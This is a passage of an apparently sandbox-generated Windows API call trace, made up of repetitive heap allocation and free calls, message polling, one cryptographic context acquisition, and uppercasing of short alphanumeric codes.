dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.603] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.605] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.606] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.606] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0164.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.606] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0164.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.607] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.607] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.608] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0164.608] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0164.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.608] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0164.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.609] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.609] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.610] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0164.610] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.610] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.611] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.611] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.611] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.611] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.611] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.632] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.633] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.633] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.633] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.633] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.633] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.634] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.634] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.634] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 